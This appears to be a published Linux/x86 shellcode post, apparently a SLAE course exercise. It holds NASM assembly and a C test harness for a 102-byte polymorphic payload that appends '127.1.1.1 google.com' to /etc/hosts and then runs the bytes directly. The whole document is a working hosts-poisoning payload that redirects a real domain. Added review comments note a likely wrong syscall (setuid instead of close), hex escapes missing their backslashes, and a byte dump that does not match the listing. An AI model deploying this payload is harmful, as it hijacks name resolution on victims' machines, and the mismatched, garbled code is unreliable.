# Title: Linux/x86 - Add map in /etc/hosts file polymorphic shellcode ( 102 bytes )
# Author: Xenofon Vassilakopoulos
# Date: 2020-06-15
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 102 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-893.php
# SLAE-ID: SLAE - 1314
# Description: Appends a hostname-to-address mapping (one line) to the /etc/hosts file

------------------ ASM ------------------

global _start

section .text

; _start - entry point (NASM syntax, 32-bit Linux, int 0x80 syscall interface).
; Builds the path "/etc///hosts" on the stack, opens it with flags 0x401 and
; keeps the returned descriptor in ebx for the write done in write_data.
; What an observer sees from this part is an append-mode, write-only open of
; /etc/hosts; it succeeds only if the process is allowed to write that file.
; The code is layout-dependent: it ends in the jmp half of jmp-call-pop, so
; _ldata and message must follow exactly as written.
_start:
xor ecx, ecx ; ecx = 0, stored below as the path's NUL terminator
xor edx, edx ; edx = 0 (third syscall argument; dl is set later for write)
xor eax, eax ; eax = 0 so that loading al alone gives a clean syscall number
mov DWORD [esp-0x4],ecx ; terminator dword, written below esp before esp is moved
mov DWORD [esp-0x8],0x7374736f ; "osts"
mov DWORD [esp-0xc],0x682f2f2f ; "///h" (extra slashes pad the path to whole dwords)
mov DWORD [esp-0x10],0x6374652f ; "/etc"
sub esp,0x10 ; esp now points at "/etc///hosts",0
mov ebx,esp ; ebx = pathname argument
mov cx, 0x3b1 ; open flags, not permissions; the value is built in two steps ...
add cx, 0x50 ; ... cx = 0x401, i.e. O_WRONLY|O_APPEND on Linux/x86
mov al, 0x5 ; syscall 5 = open on i386
int 0x80 ; open(path, 0x401, 0)
; NOTE(review): the result is not checked; a negative errno would be used as the fd.
mov ebx, eax ; ebx = descriptor for the following write
xor eax, eax
jmp short _ldata ; jmp-call-pop: go to the call that pushes the address of message

; write_data - reached only through "call write_data" in _ldata, so the value
; on top of the stack is the address of message. Writes the entry to the
; descriptor held in ebx, issues one further syscall, then exits.
write_data:
pop ecx ; ecx = address of message (return address pushed by the call)
mov dl,0x12 ; length built in two steps ...
add dl,0x3 ; ... dl = 0x15 = 21 bytes: the 20-character entry plus 0x0A
mov al,0x4 ; syscall 4 = write on i386
int 0x80 ; write(fd, message, 21)

; NOTE(review): after int 0x80 eax holds write's return value, not 4, so this
; computes al = result + 2. It would give 6 (close on i386) only if al were
; still 4; after a full 21-byte write it gives 0x17 (23, setuid on i386)
; with ebx = fd as the argument. Presumably close was intended - confirm.
add al,0x2
int 0x80

xor eax,eax
mov al,0x1 ; syscall 1 = exit on i386
int 0x80 ; exit(ebx): ebx still holds the value returned by open

; _ldata - call half of jmp-call-pop. The call pushes the address of the byte
; that follows it, which is message, and transfers control to write_data; the
; data is therefore located without any absolute address.
_ldata:
call write_data ; never returns here: write_data pops the pushed address and ends in exit
message db "127.1.1.1 google.com",0x0A ; 21 bytes: the hosts line written by write_data, newline-terminated

------------------ Shellcode ------------------


#include <stdio.h>
#include <string.h>

/*
 * Byte dump of the payload as published with the assembly listing.
 *
 * NOTE(review): the literals below read "x31xc9..." rather than "\x31\xc9...";
 * the backslashes of the hex escapes appear to have been lost when the page
 * was extracted, so as written this array holds ASCII text, not machine code.
 *
 * NOTE(review): the hex digits do not match the assembly listing byte for
 * byte: there is no "31 d2" (xor edx, edx), the length adjustment is
 * "80 c2 02" (add dl, 0x2) rather than add dl, 0x3, and the data ends in
 * "0a 0d" rather than a single 0x0A. The dump seems to come from a different
 * revision of the source, so treat the two as separate samples when comparing
 * or matching on byte values.
 */
unsigned char code[] =
"x31xc9x31xc0x89x4cx24xfcxc7x44x24xf8x6fx73x74x73xc7x44x24"
"xf4x2fx2fx2fx68xc7x44x24xf0x2fx65x74x63x83xecx10x89xe3x66"
"xb9xb1x03x66x83xc1x50xb0x05xcdx80x89xc3x31xc0xebx14x59xb2"
"x12x80xc2x02xb0x04xcdx80x04x02xcdx80x31xc0xb0x01xcdx80xe8"
"xe7xffxffxffx31x32x37x2ex31x2ex31x2ex31x20x67x6fx6fx67x6c"
"x65x2ex63x6fx6dx0ax0d";

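/*
 * Test harness: prints the length of code[] and then transfers control to it.
 *
 * The length is measured with strlen(), so it is only meaningful while the
 * array contains no zero byte before its end. Control is transferred by
 * reinterpreting the data array as a function; that works only where the
 * memory holding code[] is executable, and faults where non-executable data
 * (NX/DEP) is enforced.
 */
int main(void)
{
    /* strlen() returns size_t and takes a char pointer: print with %zu and
     * cast explicitly instead of passing unsigned char * with %d. */
    printf("Shellcode Length: %zu ", strlen((const char *)code));

    /* View the array as a function taking no arguments. */
    int (*ret)() = (int(*)())code;

    ret();
}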